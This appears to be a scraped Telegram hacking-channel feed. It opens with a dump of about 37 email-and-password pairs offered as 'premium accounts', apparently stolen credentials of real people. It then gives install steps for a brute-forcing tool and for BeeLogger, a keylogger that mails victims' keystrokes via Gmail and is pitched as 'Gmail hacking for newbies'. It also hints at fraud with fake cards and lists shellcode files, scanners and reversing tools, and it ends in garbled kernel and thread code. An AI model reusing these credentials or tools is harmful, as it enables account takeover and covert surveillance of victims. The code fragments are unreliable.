UNDERCODE COMMUNITY
2.73K subscribers
1.24K photos
31 videos
2.65K files
84.1K links
πŸ¦‘ Undercode World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE


✨ Youtube.com/Undercode
by Undercode.help
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SlingTV Premium Accounts βœ…

amy19ucf@yahoo.com:ilovedave12
mariececilia84@yahoo.com:nickel34
terence.siemon@gmail.com:12siemon
samc.tang@gmail.com:PwnageSince1917
amykaptein@yahoo.com:Hannah1998
jerenenicole1@gmail.com:simmons74
meko1123@gmail.com:carter718
morsedustin@yahoo.com:Broncos7
stowjacob@yahoo.com:weanbean4
brandonchavez719@live.com:Br4nd0!!
bostickarrington@yahoo.com:Shower23
jaceslater1501@gmail.com:Apple1015
lindarolon0228@yahoo.com:lrjr0228
haydenss123@gmail.com:worraps123
emily.c.claffey@gmail.com:calipso11
harry.adams37@gmail.com:NaHa1029
Tatyanapayne17@gmail.com:Tatylove1
Got2bloom@gmail.com:bart0772
tiffanylsmith0715@gmail.com:Purple0715
jakedotson17@gmail.com:d2394664
kevinbeharry2002@gmail.com:mangohouse827
tennflgirl@aol.com:Audie0812
brandibellville@yahoo.com:karter2013
alimwade@gmail.com:jacw4930
larsonfin@gmail.com:luok1230
ramirezanamaria594@gmail.com:Ballerina05
monroelazer@gmail.com:Chomp123
johara92ali@gmail.com:Sparkle92
hannahswenson4@gmail.com:Trevor02
ijace_gt@yahoo.com:dingo142315
miranda.allen8711@gmail.com:Miranda21
paulinaeimre@gmail.com:linux123
ameliaharms13@gmail.com:Emilysarah12
hollyahynek@gmail.com:N8329park
lynngullatte@yahoo.com:chelle71
melbell524@gmail.com:Welcome1
calebthomas15@gmail.com:tornado13

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Linux-reverse-shell.txt
7 KB
Linux Reverse tcp ShellCode 2020 βœ…
Linuxx64_Password_Protected_Bindshell_+_Null_free_Shellcode_272.c
6.2 KB
2020 Shell Linux64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)
πŸ¦‘About free domaine names :

> many sites gives trials even via fake cc

> any sites can get prm acc via bins(bad hackers)

> some websites gives free domaine name such :
https://www.freenom.com/en/index.html?lang=en
this site tempory all domaines used
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Automatically brute force all services running on a target.
> Termux-Linux


πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/1N3/BruteX.git

2) cd BruteX

3) ./install.sh

4) brutex target <port>

5) DOCKER:

> docker build -t brutex .
> docker run -it brutex target <port>

πŸ¦‘πŸ„΅πŸ„΄πŸ„°πŸ…ƒπŸ…„πŸ…πŸ„΄πŸ…‚:

Automatically brute force all services running on a target

Open ports
Usernames
Passwords

βœ…
@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Fast Gmail Hacking for newbies
Generate Gmail Emailing Keyloggers to Windows :
Using Termux-Linux :

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/4w4k3/BeeLogger.git
Running:

2) cd BeeLogger

3)sudo su

4) chmod +x install.sh

5) ./install.sh

6) python bee.py

7) If you have another version of Python:

> python2.7 bee.py

πŸ¦‘πŸ„΅πŸ„΄πŸ„°πŸ…ƒπŸ…„πŸ…πŸ„΄πŸ…‚:

1) Send logs each 120 seconds.

2) Send logs when chars > 50.

3) Send logs with GMAIL.

4) Some Phishing methods are included.

5) Multiple Session disabled.

6) Auto Persistence.

πŸ¦‘Tested on:
Kali Linux - SANA
Kali Linux - ROLLING
Ubuntu 14.04-16.04 LTS
Debian 8.5
Linux Mint 18.1

βœ…
@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 updated Web Application Attack and Audit Framework :

> w3af is an open source web application security scanner which helps developers and penetration testers identify and exploit vulnerabilities in their web applications.

The scanner is able to identify 200+ vulnerabilities, including Cross-Site Scripting, SQL injection and OS commanding.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/andresriancho/w3af.git

2) cd w3af/

3) ./w3afconsole

4) . /tmp/
w3afdependencyinstall.sh

πŸ¦‘FOR KALI :

1) apt-get update

2) apt-get install -y w3af

> This will install the latest packaged version, which might not be the latest available from our repositories. If the latest version is needed these steps are recommended:

3) cd ~

4) apt-get update

5) apt-get install -y python-pip w3af

6) pip install --upgrade pip

7) git clone
https://github.com/andresriancho/w3af.git

8) cd w3af

9) ./w3af
console

10) . /tmp/w3afdependencyinstall.sh


βœ…
@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
IP Addressing.txt
13.6 KB
detailed written tutorial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘New good wifi Hacking
A Suite of Tools written in Python for wireless auditing and security testing.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/MisterBianco/BoopSuite.git

2) go dir


3) Both a library and a toolset
Enumerate wireless interfaces

sudo python3 -m boop interface
Need additional information about a wireless interface?

sudo python3 -m boop interface {INTERFACE} -vvvv
Changing a cards mode

sudo python3 -m boop mode {INTERFACE} {monitor|managed}

4) To install open a terminal and type:
* work in progress adding to pypi

πŸ¦‘πŸ„΅πŸ„΄πŸ„°πŸ…ƒπŸ…„πŸ…πŸ„΄πŸ…‚:

BoopSuite is a wireless testing suite with extensible and independent components.

1)Need to hop wireless channels? ... βœ…

2)Need to only work with beacon packets? ... βœ…

3)Need to Monitor Deauth requests? ... βœ…

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘Docker Images for Penetration Testing & Security :


1 )Docker Images for Penetration Testing & Security
docker pull kalilinux/kali-linux-docker` [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/)

2) docker pull owasp/zap2docker-stable` - [official OWASP ZAP](https://github.com/zaproxy/zaproxy)

3) docker pull wpscanteam/wpscan` - [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/)

4) docker pull pandrew/metasploit` - [docker-metasploit](https://hub.docker.com/r/pandrew/metasploit/)

5) docker pull citizenstig/dvwa` - [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/)

6) docker pull wpscanteam/vulnerablewordpress` - [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/)

7) docker pull hmlio/vaas-cve-2014-6271` - [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/)

8) docker pull hmlio/vaas-cve-2014-0160` - [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/)

9) docker pull opendns/security-ninjas` - [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/)

10) docker pull usertaken/archlinux-pentest-lxde` - [Arch Linux Penetration Tester](https://hub.docker.com/r/usertaken/archlinux-pentest-lxde/)

11) docker pull diogomonica/docker-bench-security` - [Docker Bench for Security](https://hub.docker.com/r/diogomonica/docker-bench-security/)

12) docker pull ismisepaul/securityshepherd` - [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/)

13) docker pull danmx/docker-owasp-webgoat` - [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/)

14) docker-compose build && docker-compose up` - [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker)

15) docker pull citizenstig/nowasp` - [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/)

16) docker pull bkimminich/juice-shop` - [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container--)

17) docker pull phocean/msf` - [Docker Metasploit](https://hub.docker.com/r/phocean/msf/)

git sources
@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Tools Disassemblers and debuggers :

1) IDA - IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger

2) OllyDbg - A 32-bit assembler level analysing debugger for Windows

3) x64dbg - An open-source x64/x32 debugger for Windows

4) radare2 - A portable reversing framework

5) plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.

6) ScratchABit - Easily retargetable and hackable interactive disassembler with IDAPython-compatible plugin API

7) Capstone

git sources
@UndercodeTesting

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Decompilers :

1) JVM-based languages
Krakatau - the best decompiler I have used. Is able to decompile apps written in Scala and Kotlin into Java code. JD-GUI and Luyten have failed to do it fully.

2) JD-GUI
procyon

3) Luyten - one of the best, though a bit slow, hangs on some binaries and not very well maintained.

4) JAD - JAD Java Decompiler (closed-source, unmaintained)

5) JADX - a decompiler for Android apps. Not related to JAD.

6) Dotnet-based languages
dotPeek - a free-of-charge

7) .NET decompiler from JetBrains
ILSpy - an open-source .NET assembly browser and decompiler

8) dnSpy - .NET assembly editor, decompiler, and debugger

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘best Deobfuscators tools :


1) de4dot - .NET deobfuscator and unpacker.

2) JS Beautifier

3) JS Nice - a web service guessing JS variables names and types based on the model derived from open source.

πŸ¦‘Others :

1) nudge4j - Java tool to let the browser talk to the JVM

2) dex2jar - Tools to work with Android .dex and Java .class files

3) androguard - Reverse engineering, malware and goodware analysis of Android applications

4) antinet - .NET anti-managed debugger and anti-profiler code

5) UPX - the Ultimate Packer (and unpacker) for eXecutables

@UndercodeTesting
git sources
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Support & Share πŸ™‚

T.me/UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

Execution logging and tracing :


πŸ¦‘ Wireshark - A free and open-source packet analyzer

πŸ¦‘ tcpdump - A powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture

πŸ¦‘ mitmproxy - An interactive, SSL-capable man-in-the-middle proxy for HTTP with a console interface

πŸ¦‘ Charles Proxy - A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic

πŸ¦‘ usbmon - USB capture for Linux.

πŸ¦‘ USBPcap - USB capture for Windows.

πŸ¦‘ dynStruct - structures recovery via dynamic instrumentation.

πŸ¦‘ drltrace - shared library calls tracing.

@UndercodeTesting
git sources
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Core Technology-Code Example :
EXPERT HACKING BY UNDERCODE :

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
***********************************************************************/

/* 1 */
#define KERNEL

#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/tty.h>
#include <linux/signal.h>
#include <linux/errno.h>
#include <linux/malloc.h>

#include <asm/io.h>
#include <asm/segment.h>
#include <asm/system.h>
#include <asm/irq.h>

#include "tdd.h"

/* 2 */
static int tdd_trace;
static int write_busy;
static int read_busy;
static struct tdd_buf *qhead;
static struct tdd_buf *qtail;

/* 3 */
static int tdd_read(struct inode *, struct file *, char *, int);
static int tdd_write(struct inode *, struct file *, char *, int);
static int tdd_ioctl(struct inode *, struct file *, unsigned int,
unsigned long);
static int tdd_open(struct inode *, struct file *);
static void tdd_release(struct inode *, struct file *);
extern void console_print(char *);

struct file_operations tdd_fops =
{
NULL,
tdd_read,
tdd_write,
NULL,
NULL,
tdd_ioctl,
NULL,
tdd_open,
tdd_release,
NULL,
NULL,
NULL,
NULL
};

]
init.c

/*******************************************************

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
***********************************************************************/

void tdd_init(void)
{
tdd_trace = TRUE;

if (register_chrdev(30, "tdd", &tdd_fops))
TRACE_TXT("Cannot register tdd driver as major device 30")
else
TRACE_TXT("Tiny device driver registered successfully")

--------------------------------------------------------------------------------
newthread

/*******************************************************
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software

***********************************************************************/

new_thread(int (*start_addr)(void), int stack_size)
{
struct context *ptr;
int esp;

/* 1 */
if (!(ptr = (struct context *)malloc(sizeof(struct context))))
return 0;

/* 2 */
if (!(ptr->stack = (char *)malloc(stack_size)))
return 0;

/* 3 */
esp = (int)(ptr->stack+(stack_size-4));
*(int *)esp = (int)exit_thread;
*(int *)(esp-4) = (int)start_addr;
*(int *)(esp-icon_cool.gif = esp-4;
ptr->ebp = esp-8;
Forwarded from Backup Legal Mega
/* 4 */
if (thread_count++)
{
/* 5 */
ptr->next = current->next;
ptr->prev = current;
current->next->prev = ptr;
current->next = ptr;
}
else
{
/* 6 */
ptr->next = ptr;
ptr->prev = ptr;
current = ptr;
switch_context(&main_thread, current);
}

return 1;
}

--------------------------------------------------------------------------------
exitthead

/*******************************************************
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
***********************************************************************/

static exit_thread(void)
{
struct context dump, *ptr;

/* 1 */
if (--thread_count)
{
/* 2 */
ptr = current;
current->prev->next = current->next;
current->next->prev = current->prev;
current = current->next;
free(ptr->stack);
free(ptr);
switch_context(&dump, current);
}
else
{
/* 3 */
free(current->stack);
free(current);
switch_context(&dump, &main_thread);
}
}


getchannel

/*******************************************************

written by @Undercoder
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁